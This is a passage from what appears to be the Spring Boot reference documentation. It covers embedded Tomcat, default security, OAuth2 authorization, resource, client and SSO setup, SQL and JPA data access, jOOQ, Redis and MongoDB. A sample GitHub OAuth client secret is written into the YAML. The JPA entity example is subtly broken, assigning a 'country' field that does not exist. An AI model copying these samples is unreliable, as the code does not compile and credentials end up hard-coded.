TomcatEmbeddedServletContainerFactory();\n\t\tfactory.setPort(9000);\n\t\tfactory.setSessionTimeout(10, TimeUnit.MINUTES);\n\t\tfactory.addErrorPages(new ErrorPage(HttpStatus.NOT_FOUND, \"\/notfound.html\"));\n\t\treturn factory;\n\t}\n----\n\nSetters are provided for many configuration options. Several protected method\n'`hooks`' are also provided should you need to do something more exotic. See the\nsource code documentation for details.\n\n\n\n[[boot-features-jsp-limitations]]\n==== JSP limitations\nWhen running a Spring Boot application that uses an embedded servlet container (and is\npackaged as an executable archive), there are some limitations in the JSP support.\n\n* With Tomcat it should work if you use war packaging, i.e. an executable war will work,\n and will also be deployable to a standard container (not limited to, but including\n Tomcat). An executable jar will not work because of a hard coded file pattern in Tomcat.\n\n* Jetty does not currently work as an embedded container with JSPs.\n\n* Undertow does not support JSPs.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-web-jsp[JSP sample] so you\ncan see how to set things up.\n\n\n\n[[boot-features-security]]\n== Security\nIf Spring Security is on the classpath then web applications will be secure by default\nwith '`basic`' authentication on all HTTP endpoints. To add method-level security to a web\napplication you can also add `@EnableGlobalMethodSecurity` with your desired settings.\nAdditional information can be found in the {spring-security-reference}#jc-method[Spring\nSecurity Reference].\n\nThe default `AuthenticationManager` has a single user ('`user`' username and random\npassword, printed at INFO level when the application starts up)\n\n[indent=0]\n----\n\tUsing default security password: 78fa095d-3f4c-48b1-ad50-e24c31d5cf35\n----\n\nNOTE: If you fine tune your logging configuration, ensure that the\n`org.springframework.boot.autoconfigure.security` category is set to log `INFO` messages,\notherwise the default password will not be printed.\n\nYou can change the password by providing a `security.user.password`. This and other useful\nproperties are externalized via\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\n(properties prefix \"security\").\n\nThe default security configuration is implemented in `SecurityAutoConfiguration` and in\nthe classes imported from there (`SpringBootWebSecurityConfiguration` for web security\nand `AuthenticationManagerConfiguration` for authentication configuration which is also\nrelevant in non-web applications). To switch off the Boot default configuration\ncompletely in a web application you can add a bean with `@EnableWebSecurity`. To customize\nit you normally use external properties and beans of type `WebSecurityConfigurerAdapter`\n(e.g. to add form-based login). There are several secure applications in the\n{github-code}\/spring-boot-samples\/[Spring Boot samples] to get you started with common\nuse cases.\n\nThe basic features you get out of the box in a web application are:\n\n* An `AuthenticationManager` bean with in-memory store and a single user (see\n `SecurityProperties.User` for the properties of the user).\n* Ignored (unsecure) paths for common static resource locations (`+\/css\/**+`, `+\/js\/**+`,\n `+\/images\/**+` and `+**\/favicon.ico+`).\n* HTTP Basic security for all other endpoints.\n* Security events published to Spring's `ApplicationEventPublisher` (successful and\n unsuccessful authentication and access denied).\n* Common low-level features (HSTS, XSS, CSRF, caching) provided by Spring Security are\n on by default.\n\nAll of the above can be switched on and off or modified using external properties\n(`+security.*+`). To override the access rules without changing any other autoconfigured\nfeatures add a `@Bean` of type `WebSecurityConfigurerAdapter` with\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)`.\n\n\n\n[[boot-features-security-oauth2]]\n=== OAuth2\nIf you have `spring-security-oauth2` on your classpath you can take advantage of some\nauto-configuration to make it easy to set up Authorization or Resource Server.\n\n\n\n[[boot-features-security-oauth2-authorization-server]]\n==== Authorization Server\nTo create an Authorization Server and grant access tokens you need to use\n`@EnableAuthorizationServer` and provide `security.oauth2.client.client-id` and\n`security.oauth2.client.client-secret]` properties. The client will be registered for you\nin an in-memory repository.\n\nHaving done that you will be able to use the client credentials to create an access token,\nfor example:\n\n[indent=0]\n----\n\t$ curl client:secret@localhost:8080\/oauth\/token -d grant_type=password -d username=user -d password=pwd\n----\n\nThe basic auth credentials for the `\/token` endpoint are the `client-id` and\n`client-secret`. The user credentials are the normal Spring Security user details (which\ndefault in Spring Boot to \"`user`\" and a random password).\n\nTo switch off the auto-configuration and configure the Authorization Server features\nyourself just add a `@Bean` of type `AuthorizationServerConfigurer`.\n\n\n\n[[boot-features-security-oauth2-resource-server]]\n==== Resource Server\nTo use the access token you need a Resource Server (which can be the same as the\nAuthorization Server). Creating a Resource Server is easy, just add\n`@EnableResourceServer` and provide some configuration to allow the server to decode\naccess tokens. If your appplication is also an Authorization Server it already knows how\nto decode tokens, so there is nothing else to do. If your app is a standalone service then you\nneed to give it some more configuration, one of the following options:\n\n* `security.oauth2.resource.user-info-uri` to use the `\/me` resource (e.g.\n`https:\/\/uaa.run.pivotal.io\/userinfo` on PWS)\n\n* `security.oauth2.resource.token-info-uri` to use the token decoding endpoint (e.g.\n`https:\/\/uaa.run.pivotal.io\/check_token` on PWS).\n\nIf you specify both the `user-info-uri` and the `token-info-uri` then you can set a flag\nto say that one is preferred over the other (`prefer-token-info=true` is the default).\n\nAlternatively (instead of `user-info-uri` or `token-info-uri`) if the tokens are JWTs you\ncan configure a `security.oauth2.resource.jwt.key-value` to decode them locally (where the\nkey is a verification key). The verification key value is either a symmetric secret or\nPEM-encoded RSA public key. If you don't have the key and it's public you can provide a\nURI where it can be downloaded (as a JSON object with a \"`value`\" field) with\n`security.oauth2.resource.jwt.key-uri`. E.g. on PWS:\n\n[indent=0]\n----\n\t$ curl https:\/\/uaa.run.pivotal.io\/token_key\n\t{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}\n----\n\nWARNING: If you use the `security.oauth2.resource.jwt.key-uri` the authorization server\nneeds to be running when your application starts up. It will log a warning if it can't\nfind the key, and tell you what to do to fix it.\n\n\n\n[[boot-features-security-oauth2-token-type]]\n=== Token Type in User Info\nGoogle, and certain other 3rd party identity providers, are more strict about the token\ntype name that is sent in the headers to the user info endpoint. The default is \"`Bearer`\"\nwhich suits most providers and matches the spec, but if you need to change it you can set\n`security.oauth2.resource.token-type`.\n\n\n\n[[boot-features-security-custom-user-info]]\n=== Customizing the User Info RestTemplate\nIf you have a `user-info-uri`, the resource server features use an `OAuth2RestTemplate`\ninternally to fetch user details for authentication. This is provided as a qualified\n`@Bean` with id `userInfoRestTemplate`, but you shouldn't need to know that to just\nuse it. The default should be fine for most providers, but occasionally you might need to\nadd additional interceptors, or change the request authenticator (which is how the token\ngets attached to outgoing requests). To add a customization just create a bean of type\n`UserInfoRestTemplateCustomizer` - it has a single method that will be called after the\nbean is created but before it is initialized. The rest template that is being customized\nhere is _only_ used internally to carry out authentication.\n\n[TIP]\n====\nTo set an RSA key value in YAML use the \"`pipe`\" continuation marker to split it over\nmultiple lines (\"`|`\") and remember to indent the key value (it's a standard YAML\nlanguage feature). Example:\n\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tresource:\n\t\t\t\tjwt:\n\t\t\t\t\tkeyValue: |\n\t\t\t\t\t\t-----BEGIN PUBLIC KEY-----\n\t\t\t\t\t\tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC...\n\t\t\t\t\t\t-----END PUBLIC KEY-----\n----\n====\n\n\n\n[[boot-features-security-custom-user-info-client]]\n==== Client\nTo make your webapp into an OAuth2 client you can simply add `@EnableOAuth2Client` and\nSpring Boot will create an `OAuth2RestTemplate` for you to `@Autowire`. It uses the\n`security.oauth2.client.*` as credentials (the same as you might be using in the\nAuthorization Server), but in addition it will need to know the authorization and token\nURIs in the Authorization Server. For example:\n\n.application.yml\n[source,yaml,indent=0]\n----\n\tsecurity:\n\t\toauth2:\n\t\t\tclient:\n\t\t\t\tclientId: bd1c0a783ccdd1c9b9e4\n\t\t\t\tclientSecret: 1a9030fbca47a5b2c28e92f19050bb77824b5ad1\n\t\t\t\taccessTokenUri: https:\/\/github.com\/login\/oauth\/access_token\n\t\t\t\tuserAuthorizationUri: https:\/\/github.com\/login\/oauth\/authorize\n\t\t\t\tclientAuthenticationScheme: form\n----\n\nAn application with this configuration will redirect to Github for authorization when you\nattempt to use the `OAuth2RestTemplate`. If you are already signed into Github you won't\neven notice that it has authenticated. These specific credentials will only work if your\napplication is running on port 8080 (register your own client app in Github or other\nprovider for more flexibility).\n\nTo limit the scope that the client asks for when it obtains an access token you can set\n`security.oauth2.client.scope` (comma separated or an array in YAML). By default the scope\nis empty and it is up to Authorization Server to decide what the defaults should be,\nusually depending on the settings in the client registration that it holds.\n\nNOTE: There is also a setting for `security.oauth2.client.client-authentication-scheme`\nwhich defaults to \"`header`\" (but you might need to set it to \"`form`\" if, like Github for\ninstance, your OAuth2 provider doesn't like header authentication). In fact, the\n`security.oauth2.client.*` properties are bound to an instance of\n`AuthorizationCodeResourceDetails` so all its properties can be specified.\n\nTIP: In a non-web application you can still `@Autowire` an `OAuth2RestOperations` and it\nis still wired into the `security.oauth2.client.*` configuration. In this case it is a\n\"`client credentials token grant`\" you will be asking for if you use it (and there is no\nneed to use `@EnableOAuth2Client` or `@EnableOAuth2Sso`). To switch it off, just remove\nthe `security.oauth2.client.client-id` from your configuration (or make it the empty\nstring).\n\n\n\n[[boot-features-security-oauth2-single-sign-on]]\n==== Single Sign On\nAn OAuth2 Client can be used to fetch user details from the provider (if such features are\navailable) and then convert them into an `Authentication` token for Spring Security.\nThe Resource Server above support this via the `user-info-uri` property This is the basis\nfor a Single Sign On (SSO) protocol based on OAuth2, and Spring Boot makes it easy to\nparticipate by providing an annotation `@EnableOAuth2Sso`. The Github client above can\nprotect all its resources and authenticate using the Github `\/user\/` endpoint, by adding\nthat annotation and declaring where to find the endpoint (in addition to the\n`security.oauth2.client.*` configuration already listed above):\n\n.application.yml\n[source,yaml,indent=0]]\n----\n\tsecurity:\n\t\toauth2:\n\t...\n\t\tresource:\n\t\t\tuserInfoUri: https:\/\/api.github.com\/user\n\t\t\tpreferTokenInfo: false\n----\n\nSince all paths are secure by default, there is no \"`home`\" page that you can show to\nunauthenticated users and invite them to login (by visiting the `\/login` path, or the\npath specified by `security.oauth2.sso.login-path`).\n\nTo customize the access rules or paths to protect, so you can add a \"`home`\" page for\ninstance, `@EnableOAuth2Sso` can be added to a `WebSecurityConfigurerAdapter` and the\nannotation will cause it to be decorated and enhanced with the necessary pieces to get\nthe `\/login` path working. For example, here we simply allow unauthenticated access\nto the home page at \"\/\" and keep the default for everything else:\n\n[source,java,indent=0]\n----\n\t@Configuration\n\tpublic class WebSecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(WebSecurity web) {\n\t\t\tweb.ignore(\"\/\");\n\t\t}\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp.antMatcher(\"\/**\").authorizeRequests().anyRequest().authenticated();\n\t\t}\n\n\t}\n----\n\n\n\n[[boot-features-security-actuator]]\n=== Actuator Security\nIf the Actuator is also in use, you will find:\n\n* The management endpoints are secure even if the application endpoints are unsecure.\n* Security events are transformed into `AuditEvents` and published to the `AuditService`.\n* The default user will have the `ADMIN` role as well as the `USER` role.\n\nThe Actuator security features can be modified using external properties\n(`+management.security.*+`). To override the application access rules\nadd a `@Bean` of type `WebSecurityConfigurerAdapter` and use\n`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override\nthe actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`\nif you _do_ want to override the actuator access rules.\n\n\n\n[[boot-features-sql]]\n== Working with SQL databases\nThe Spring Framework provides extensive support for working with SQL databases. From\ndirect JDBC access using `JdbcTemplate` to complete '`object relational mapping`'\ntechnologies such as Hibernate. Spring Data provides an additional level of functionality,\ncreating `Repository` implementations directly from interfaces and using conventions to\ngenerate queries from your method names.\n\n\n\n[[boot-features-configure-datasource]]\n=== Configure a DataSource\nJava's `javax.sql.DataSource` interface provides a standard method of working with\ndatabase connections. Traditionally a DataSource uses a `URL` along with some\ncredentials to establish a database connection.\n\n\n\n[[boot-features-embedded-database-support]]\n==== Embedded Database Support\nIt's often convenient to develop applications using an in-memory embedded database.\nObviously, in-memory databases do not provide persistent storage; you will need to\npopulate your database when your application starts and be prepared to throw away\ndata when your application ends.\n\nTIP: The '`How-to`' section includes a _<<howto.adoc#howto-database-initialization,\nsection on how to initialize a database>>_\n\nSpring Boot can auto-configure embedded http:\/\/www.h2database.com[H2],\nhttp:\/\/hsqldb.org\/[HSQL] and http:\/\/db.apache.org\/derby\/[Derby] databases. You don't need\nto provide any connection URLs, simply include a build dependency to the embedded database\nthat you want to use.\n\nFor example, typical POM dependencies would be:\n\n[source,xml,indent=0]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-jpa<\/artifactId>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>org.hsqldb<\/groupId>\n\t\t<artifactId>hsqldb<\/artifactId>\n\t\t<scope>runtime<\/scope>\n\t<\/dependency>\n----\n\nTIP: If you're using H2 and, for whatever reason, you do configure its connection URL,\ncare should be taken to disable the database's automatic shutdown using\n`DB_CLOSE_ON_EXIT=FALSE`. This allows Spring Boot to control when the database is closed,\nthereby ensuring that it happens once access to the database is no longer needed.\n\nNOTE: You need a dependency on `spring-jdbc` for an embedded database to be\nauto-configured. In this example it's pulled in transitively via\n`spring-boot-starter-data-jpa`.\n\n\n\n[[boot-features-connect-to-production-database]]\n==== Connection to a production database\nProduction database connections can also be auto-configured using a pooling `DataSource`.\nHere's the algorithm for choosing a specific implementation:\n\n* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if\n that is available we always choose it.\n* If HikariCP is available we will use it.\n* If Commons DBCP is available we will use it, but we don't recommend it in production.\n* Lastly, if Commons DBCP2 is available we will use it.\n\nIf you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`\n'`starter POMs`' you will automatically get a dependency to `tomcat-jdbc`.\n\nNOTE: You can bypass that algorithm completely and specify the connection pool to use via\nthe `spring.datasource.type` property. Also, additional connection pools can always be\nconfigured manually. If you define your own `DataSource` bean, auto-configuration will\nnot occur.\n\nDataSource configuration is controlled by external configuration properties in\n`+spring.datasource.*+`. For example, you might declare the following section in\n`application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tspring.datasource.username=dbuser\n\tspring.datasource.password=dbpass\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n----\n\nSee {sc-spring-boot-autoconfigure}\/jdbc\/DataSourceProperties.{sc-ext}[`DataSourceProperties`]\nfor more of the supported options. Note also that you can configure any of the\n`DataSource` implementation specific properties via `+spring.datasource.*+`: refer to the\ndocumentation of the connection pool implementation you are using for more details.\n\nTIP: You often won't need to specify the `driver-class-name` since Spring boot can deduce\nit for most databases from the `url`.\n\nNOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid\n`Driver` class is available, so we check for that before doing anything. I.e. if you set\n`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be\nloadable.\n\n\n\n[[boot-features-connecting-to-a-jndi-datasource]]\n==== Connection to a JNDI DataSource\nIf you are deploying your Spring Boot application to an Application Server you might want\nto configure and manage your DataSource using your Application Servers built-in features\nand access it using JNDI.\n\nThe `spring.datasource.jndi-name` property can be used as an alternative to the\n`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`\nproperties to access the `DataSource` from a specific JNDI location. For example, the\nfollowing section in `application.properties` shows how you can access a JBoss AS defined\n`DataSource`:\n\n[source,properties,indent=0]\n----\n\tspring.datasource.jndi-name=java:jboss\/datasources\/customers\n----\n\n\n\n[[boot-features-using-jdbc-template]]\n=== Using JdbcTemplate\nSpring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and\nyou can `@Autowire` them directly into your own beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jdbc.core.JdbcTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JdbcTemplate jdbcTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JdbcTemplate jdbcTemplate) {\n\t\t\tthis.jdbcTemplate = jdbcTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-jpa-and-spring-data]]\n=== JPA and '`Spring Data`'\nThe Java Persistence API is a standard technology that allows you to '`map`' objects to\nrelational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get\nstarted. It provides the following key dependencies:\n\n* Hibernate -- One of the most popular JPA implementations.\n* Spring Data JPA -- Makes it easy to implement JPA-based repositories.\n* Spring ORMs -- Core ORM support from the Spring Framework.\n\nTIP: We won't go into too many details of JPA or Spring Data here. You can follow the\nhttp:\/\/spring.io\/guides\/gs\/accessing-data-jpa\/['`Accessing Data with JPA`'] guide from\nhttp:\/\/spring.io and read the http:\/\/projects.spring.io\/spring-data-jpa\/[Spring Data JPA]\nand http:\/\/hibernate.org\/orm\/documentation\/[Hibernate] reference documentation.\n\n\n\n[[boot-features-entity-classes]]\n==== Entity Classes\nTraditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With\nSpring Boot this file is not necessary and instead '`Entity Scanning`' is used. By default\nall packages below your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) will be searched.\n\nAny classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be\nconsidered. A typical entity class would look something like this:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport java.io.Serializable;\n\timport javax.persistence.*;\n\n\t@Entity\n\tpublic class City implements Serializable {\n\n\t\t@Id\n\t\t@GeneratedValue\n\t\tprivate Long id;\n\n\t\t@Column(nullable = false)\n\t\tprivate String name;\n\n\t\t@Column(nullable = false)\n\t\tprivate String state;\n\n\t\t\/\/ ... additional members, often include @OneToMany mappings\n\n\t\tprotected City() {\n\t\t\t\/\/ no-args constructor required by JPA spec\n\t\t\t\/\/ this one is protected since it shouldn't be used directly\n\t\t}\n\n\t\tpublic City(String name, String state) {\n\t\t\tthis.name = name;\n\t\t\tthis.country = country;\n\t\t}\n\n\t\tpublic String getName() {\n\t\t\treturn this.name;\n\t\t}\n\n\t\tpublic String getState() {\n\t\t\treturn this.state;\n\t\t}\n\n\t\t\/\/ ... etc\n\n\t}\n----\n\nTIP: You can customize entity scanning locations using the `@EntityScan` annotation. See\nthe _<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>_ how-to.\n\n\n\n[[boot-features-spring-data-jpa-repositories]]\n==== Spring Data JPA Repositories\nSpring Data JPA repositories are interfaces that you can define to access data. JPA\nqueries are created automatically from your method names. For example, a `CityRepository`\ninterface might declare a `findAllByState(String state)` method to find all cities in a\ngiven state.\n\nFor more complex queries you can annotate your method using Spring Data's\n{spring-data-javadoc}\/repository\/Query.html[`Query`] annotation.\n\nSpring Data repositories usually extend from the\n{spring-data-commons-javadoc}\/repository\/Repository.html[`Repository`] or\n{spring-data-commons-javadoc}\/repository\/CrudRepository.html[`CrudRepository`] interfaces.\nIf you are using auto-configuration, repositories will be searched from the package\ncontaining your main configuration class (the one annotated with\n`@EnableAutoConfiguration` or `@SpringBootApplication`) down.\n\nHere is a typical Spring Data repository:\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: We have barely scratched the surface of Spring Data JPA. For complete details check\ntheir http:\/\/projects.spring.io\/spring-data-jpa\/[reference documentation].\n\n\n\n[[boot-features-creating-and-dropping-jpa-databases]]\n==== Creating and dropping JPA databases\nBy default, JPA databases will be automatically created *only* if you use an embedded\ndatabase (H2, HSQL or Derby). You can explicitly configure JPA settings using\n`+spring.jpa.*+` properties. For example, to create and drop tables you can add the\nfollowing to your `application.properties`.\n\n[indent=0]\n----\n\tspring.jpa.hibernate.ddl-auto=create-drop\n----\n\nNOTE: Hibernate's own internal property name for this (if you happen to remember it\nbetter) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native\nproperties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them\nto the entity manager). Example:\n\n[indent=0]\n----\n\tspring.jpa.properties.hibernate.globally_quoted_identifiers=true\n----\n\npasses `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.\n\nBy default the DDL execution (or validation) is deferred until the `ApplicationContext`\nhas started. There is also a `spring.jpa.generate-ddl` flag, but it is not used if\nHibernate autoconfig is active because the `ddl-auto` settings are more fine-grained.\n\n\n\n[[boot-features-sql-h2-console]]\n=== Using H2's web console\nThe http:\/\/www.h2database.com[H2 database] provides a\nhttp:\/\/www.h2database.com\/html\/quickstart.html#h2_console[browser-based console] that\nSpring Boot can auto-configure for you. The console will be auto-configured when the\nfollowing conditions are met:\n\n* You are developing a web application\n* `com.h2database:h2` is on the classpath\n* You are using <<using-spring-boot.adoc#using-boot-devtools,Spring Boot's developer\n tools>>\n\nTIP: If you are not using Spring Boot's developer tools, but would still like to make use\nof H2's console, then you can do so by configuring the `spring.h2.console.enabled`\nproperty with a value of `true`. The H2 console is only intended for use during\ndevelopment so care should be taken to ensure that `spring.h2.console.enabled` is not set\nto `true` in production.\n\n\n\n[[boot-features-sql-h2-console-custom-path]]\n==== Changing the H2 console's path\nBy default the console will be available at `\/h2-console`. You can customize the console's\npath using the `spring.h2.console.path` property.\n\n\n\n[[boot-features-sql-h2-console-securing]]\n==== Securing the H2 console\nWhen Spring Security is on the classpath and basic auth is enabled, the H2 console will be\nautomatically secured using basic auth. The following properties can be used to customize\nthe security configuration:\n\n* `security.user.role`\n* `security.basic.authorize-mode`\n* `security.basic.enabled`\n\n\n\n[[boot-features-jooq]]\n== Using jOOQ\nJava Object Oriented Querying (http:\/\/www.jooq.org\/[jOOQ]) is a popular product from\nhttp:\/\/www.datageekery.com\/[Data Geekery] which generates Java code from your\ndatabase, and lets you build type safe SQL queries through its fluent API. Both the\ncommercial and open source editions can be used with Spring Boot.\n\n\n\n=== Code Generation\nIn oder to use jOOQ type-safe queries, you need to generate Java classes from your\ndatabase schema. You can follow the instructions in the\nhttp:\/\/www.jooq.org\/doc\/3.6\/manual-single-page\/#jooq-in-7-steps-step3[jOOQ user manual].\nIf you are using the `jooq-codegen-maven` plugin (and you also use the\n`spring-boot-starter-parent` \"`parent POM`\") you can safely omit the plugin's `<version>`\ntag. You can also use Spring Boot defined version variables (e.g. `h2.version`) to\ndeclare the plugin's database dependency. Here's an example:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.jooq<\/groupId>\n\t\t<artifactId>jooq-codegen-maven<\/artifactId>\n\t\t<executions>\n\t\t\t...\n\t\t<\/executions>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>com.h2database<\/groupId>\n\t\t\t\t<artifactId>h2<\/artifactId>\n\t\t\t\t<version>${h2.version}<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t\t<configuration>\n\t\t\t<jdbc>\n\t\t\t\t<driver>org.h2.Driver<\/driver>\n\t\t\t\t<url>jdbc:h2:~\/yourdatabase<\/url>\n\t\t\t<\/jdbc>\n\t\t\t<generator>\n\t\t\t\t...\n\t\t\t<\/generator>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\n\n\n=== Using DSLContext\nThe fluent API offered by jOOQ is initiated via the `org.jooq.DSLContext` interface.\nSpring Boot will auto-configure a `DSLContext` as a Spring Bean and connect it to your\napplication `DataSource`. To use the `DSLContext` you can just `@Autowire` it:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class JooqExample implements CommandLineRunner {\n\n\t\tprivate final DSLContext create;\n\n\t\t@Autowired\n\t\tpublic JooqExample(DSLContext dslContext) {\n\t\t\tthis.create = dslContext;\n\t\t}\n\n\t}\n----\n\nTIP: The jOOQ manual tends to use a variable named `create` to hold the `DSLContext`,\nwe've done the same for this example.\n\nYou can then use the `DSLContext` to construct your queries:\n\n[source,java,indent=0]\n----\n\tpublic List<GregorianCalendar> authorsBornAfter1980() {\n\t\treturn this.create.selectFrom(AUTHOR)\n\t\t\t.where(AUTHOR.DATE_OF_BIRTH.greaterThan(new GregorianCalendar(1980, 0, 1)))\n\t\t\t.fetch(AUTHOR.DATE_OF_BIRTH);\n\t}\n----\n\n\n\n=== Customizing jOOQ\nYou can customize the SQL dialect used by jOOQ by setting `spring.jooq.sql-dialect` in\nyour `application.properties`. For example, to specify Postgres you would add:\n\n[source,properties,indent=0]\n----\n\tspring.jooq.sql-dialect=Postgres\n----\n\nMore advanced customizations can be achieved by defining your own `@Bean` definitions\nwhich will be used when the jOOQ `Configuration` is created. You can define beans for\nthe following jOOQ Types:\n\n* `ConnectionProvider`\n* `TransactionProvider`\n* `RecordMapperProvider`\n* `RecordListenerProvider`\n* `ExecuteListenerProvider`\n* `VisitListenerProvider`\n\nYou can also create your own `org.jooq.Configuration` `@Bean` if you want to take\ncomplete control of the jOOQ configuration.\n\n\n\n[[boot-features-nosql]]\n== Working with NoSQL technologies\nSpring Data provides additional projects that help you access a variety of NoSQL\ntechnologies including\nhttp:\/\/projects.spring.io\/spring-data-mongodb\/[MongoDB],\nhttp:\/\/projects.spring.io\/spring-data-neo4j\/[Neo4J],\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch\/[Elasticsearch],\nhttp:\/\/projects.spring.io\/spring-data-solr\/[Solr],\nhttp:\/\/projects.spring.io\/spring-data-redis\/[Redis],\nhttp:\/\/projects.spring.io\/spring-data-gemfire\/[Gemfire],\nhttp:\/\/projects.spring.io\/spring-data-couchbase\/[Couchbase] and\nhttp:\/\/projects.spring.io\/spring-data-cassandra\/[Cassandra].\nSpring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and\nCassandra; you can make use of the other projects, but you will need to configure them\nyourself. Refer to the appropriate reference documentation at\nhttp:\/\/projects.spring.io\/spring-data[projects.spring.io\/spring-data].\n\n\n\n[[boot-features-redis]]\n=== Redis\nhttp:\/\/redis.io\/[Redis] is a cache, message broker and richly-featured key-value store.\nSpring Boot offers basic auto-configuration for the\nhttps:\/\/github.com\/xetorthio\/jedis\/[Jedis] client library and abstractions on top of it\nprovided by https:\/\/github.com\/spring-projects\/spring-data-redis[Spring Data Redis]. There\nis a `spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\n\n\n[[boot-features-connecting-to-redis]]\n==== Connecting to Redis\nYou can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or\nvanilla `RedisTemplate` instance as you would any other Spring Bean. By default the\ninstance will attempt to connect to a Redis server using `localhost:6379`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate StringRedisTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(StringRedisTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of any of the auto-configured types it will replace the\ndefault (except in the case of `RedisTemplate` the exclusion is based on the bean name\n'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a\npooled connection factory by default.\n\n\n\n[[boot-features-mongodb]]\n=== MongoDB\nhttp:\/\/www.mongodb.com\/[MongoDB] is an open-source NoSQL document database that uses a\nJSON-like schema instead of traditional table-based relational data. Spring Boot offers\nseveral conveniences for working with MongoDB, including the\n`spring-boot-starter-data-mongodb` '`Starter POM`'.\n\n\n\n[[boot-features-connecting-to-mongodb]]\n==== Connecting to a MongoDB database\nYou can inject an auto-configured `org.springframework.data.mongodb.MongoDbFactory` to\naccess Mongo databases. By default the instance will attempt to connect to a MongoDB\nserver using the URL `mongodb:\/\/localhost\/test`:\n\n[source,java,indent=0]\n----\n\timport org.springframework.data.mongodb.MongoDbFactory;\n\timport com.mongodb.DB;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoDbFactory mongo;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoDbFactory mongo) {\n\t\t\tthis.mongo = mongo;\n\t\t}\n\n\t\t\/\/ ...\n\n\t\tpublic void example() {\n\t\t\tDB db = mongo.getDb();\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nYou can set `spring.data.mongodb.uri` property to change the URL and configure\nadditional settings such as the _replica set_:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.uri=mongodb:\/\/user:secret@mongo1.example.com:12345,mongo2.example.com:23456\/test\n----\n\nAlternatively, as long as you're using Mongo 2.x, specify a `host`\/`port`. For example,\nyou might declare the following in your `application.properties`:\n\n[source,properties,indent=0]\n----\n\tspring.data.mongodb.host=mongoserver\n\tspring.data.mongodb.port=27017\n----\n\nNOTE: `spring.data.mongodb.host` and `spring.data.mongodb.port` are not supported if\nyou're using the Mongo 3.0 Java driver. In such cases, `spring.data.mongodb.uri` should be\nused to provide all of the configuration.\n\nTIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used. You\ncould simply delete this line from the sample above.\n\nTIP: If you aren't using Spring Data Mongo you can inject `com.mongodb.Mongo` beans\ninstead of using `MongoDbFactory`.\n\nYou can also declare your own `MongoDbFactory` or `Mongo` bean if you want to take\ncomplete control of establishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a\n{spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`] class that is very\nsimilar in its design to Spring's `JdbcTemplate`. As with `JdbcTemplate` Spring Boot\nauto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport 